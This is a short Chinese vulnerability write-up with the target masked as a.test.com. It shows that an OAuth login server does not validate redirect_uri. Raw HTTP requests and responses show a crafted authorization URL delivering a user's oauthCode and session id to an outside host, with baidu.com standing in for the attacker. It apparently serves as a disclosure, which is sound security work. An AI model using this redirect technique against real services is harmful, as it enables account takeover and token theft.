0x00 前言

文章中的项目地址统一修改为: a.test.com 保护厂商也保护自己

0x01 概要

漏洞url:http://a.test.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
redirect_uri 完全没验证导致可任意url获取token
1.png

0x02 请求包

0x02.1 请求包1:

Request:

  1. POST http://a.test.com:8087/oauthserver/loginAction.action HTTP/1.1
  2. Host: a.test.com:8087
  3. Connection: keep-alive
  4. Content-Length: 196
  5. Cache-Control: max-age=0
  6. Origin: http://a.test.com:8087
  7. Upgrade-Insecure-Requests: 1
  8. DNT: 1
  9. Content-Type: application/x-www-form-urlencoded
  10. User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
  11. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  12. Referer: http://a.test.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
  13. Accept-Encoding: gzip, deflate
  14. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  15. Cookie: cookie不能给你哦~
  16. user.redirect_uri=http%3A%2F%2Fbaidu.com&user.response_type=&user.client_id=7D4A4A2C4B701548F97FA88C379447BA&user.state=&user.scope=&user.resource_url=&user.account=tsetaaaa&user.password=tsetaaaa

Response:

  1. HTTP/1.1 302 Found
  2. Server: Apache-Coyote/1.1
  3. Set-Cookie: JSESSIONID=2006E057AE8523895F2DB0F85A84E321; Path=/oauthserver; Secure; HttpOnly
  4. Location: http://baidu.com?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
  5. Content-Length: 0
  6. Date: Tue, 19 Mar 2019 08:56:42 GMT

0x02.2 请求包2:

Request:

  1. GET http://baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa HTTP/1.1
  2. Host: baidu.com
  3. Connection: keep-alive
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. DNT: 1
  7. User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  9. Referer: http://a.test.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
  10. Accept-Encoding: gzip, deflate
  11. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  12. Cookie: cookie不能给你哦~

Response:

  1. HTTP/1.1 302 Moved Temporarily
  2. Server: bfe/1.0.8.18
  3. Date: Tue, 19 Mar 2019 08:56:43 GMT
  4. Content-Type: text/html
  5. Content-Length: 161
  6. Connection: Keep-Alive
  7. Location: https://www.baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
  8. Expires: Wed, 20 Mar 2019 08:56:43 GMT
  9. Cache-Control: max-age=86400
  10. Cache-Control: privae
  11. <html>
  12. <head><title>302 Found</title></head>
  13. <body bgcolor="white">
  14. <center><h1>302 Found</h1></center>
  15. <hr><center>bfe/1.0.8.18</center>
  16. </body>
  17. </html>

用户登录token:https://www.baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
2.png